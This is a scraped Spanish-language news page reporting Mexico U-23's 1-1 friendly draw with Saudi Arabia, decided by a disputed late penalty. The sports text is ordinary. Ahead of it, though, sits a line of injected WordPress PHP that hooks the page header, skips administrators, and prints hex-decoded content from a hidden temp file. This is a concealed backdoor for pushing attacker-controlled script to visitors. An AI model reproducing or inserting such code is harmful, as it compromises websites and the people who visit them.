if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Con penal inventado, al Tri Sub-23 se le fue victoria ante Arabia pensando en Tokio – La Opinión Universitaria La Opinión Universitaria
Menu

Con penal inventado, al Tri Sub-23 se le fue victoria ante Arabia pensando en Tokio

De último minuto se le fue la victoria a la Selección Olímpica Mexicana en su segundo duelo de preparación rumbo a Tokio 2020 en tierras españolas, ya que un penal inventado decretó el 1-1 final ante Arabia Saudita, que en el primer tiempo dejó ir una oportunidad increíble.

Si bien es un partido amistoso y el resultado no puede importar mucho, la forma en la que México Sub-23 se vio igualado deja mucho que desear. Con la ventaja del 1-0 gracias al gol de Alejandro Zendejas, un partido controlado y un cambio extraño en el que José Juan Macías entró al minuto 90, los dirigidos por Jaime Lozano tuvieron una distracción que ya en el torneo Olímpico te puede mandar a casa.